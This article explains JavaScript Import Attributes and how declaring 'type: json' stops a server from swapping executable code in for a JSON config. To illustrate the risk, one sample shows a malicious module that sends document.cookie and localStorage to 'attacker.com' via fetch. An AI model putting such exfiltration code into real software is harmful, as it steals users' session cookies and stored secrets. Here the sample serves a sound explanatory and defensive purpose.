Up to date

Up to date

JavaScript Import Attributes (ES2025) Understanding the new import attributes syntax and why we can't rely on file extensions alone

JSON import attributes Limited availability Supported in Chrome: yes. Supported in Edge: yes. Supported in Firefox: no. Supported in Safari: yes. This feature is not Baseline because it does not work in some of the most widely-used browsers. JSON import attributes on Web Platform Status

JavaScript is getting a new feature that makes module imports more explicit and secure. Import Attributes add a way to pass metadata about any module we’re importing - whether it’s JSON, JavaScript, or other module types.

The Core Problem

On the web, file extensions don’t reliably indicate content. A server might return JavaScript when you’re expecting JSON:

JavaScript 1 // This looks safe, but could be dangerous 2 import config from './config.json' ; 3 4 // The server could respond with executable code: 5 export default ( function (){ 6 // Unexpected code execution 7 } )() ;

The Solution: Import Attributes

Import Attributes create a contract between your code and the runtime. You explicitly declare what type of module you expect:

JavaScript 1 // Explicitly require JSON 2 import config from './config.json' with { type : "json" } ; 3 4 // Or specify JavaScript 5 import module from './module.js' with { type : "javascript" } ; 6 7 // Works with dynamic imports too 8 const data = await import ( './config.json' , { 9 with : { type : "json" } 10 } ) ;

The syntax works consistently across different module contexts:

JavaScript 1 // Re-exporting with attributes 2 export { data } from './data.json' with { type : "json" } ; 3 4 // Web Worker instantiation 5 new Worker ( "processor.wasm" , { 6 type : "module" , 7 with : { type : "webassembly" } 8 } ) ;

Why Import Attributes?

The core problem is security. On the web, file extensions don’t reliably indicate content. A URL ending in .json might actually serve JavaScript:

JavaScript 1 // Loading API configuration 2 import apiConfig from './api-config.json' ; 3 4 // What you expect to get: 5 { 6 "apiKey" : "secret-key" , 7 "endpoint" : "https://api.example.com" , 8 "timeout" : 5000 9 } 10 11 // What a compromised server could send instead: 12 export default ( function (){ 13 // Send your API keys to an attacker 14 fetch ( 'https://attacker.com' , { 15 method : 'POST' , 16 body : JSON . stringify ( { 17 cookies : document . cookie , 18 localStorage : window . localStorage 19 } ) 20 } ) ; 21 22 // Then return what looks like normal config 23 return { 24 apiKey : "secret-key" , 25 endpoint : "https://api.example.com" , 26 timeout : 5000 27 } 28 } )() ;

Import Attributes make our module system more explicit and secure. JSON modules can’t execute code - they’re pure data. When you mark a module with type: "json" , you’re guaranteed to get either JSON data or an error, never executable code.

The most immediate impact is on JSON imports, where security is crucial:

JavaScript 1 // Configuration files 2 import config from './config.json' with { type : "json" } ; 3 4 // Dynamic configuration 5 const config = await import ( 6 `./config. ${ env } .json` , 7 { with : { type : "json" }} 8 ) ;

This feature creates a foundation for safely handling different module types in JavaScript. When it lands in 2025, we’ll have a standard way to declare our expectations about modules across all JavaScript environments.

Think of it as adding type safety to your module imports - not for the data inside the modules, but for the modules themselves.

Sources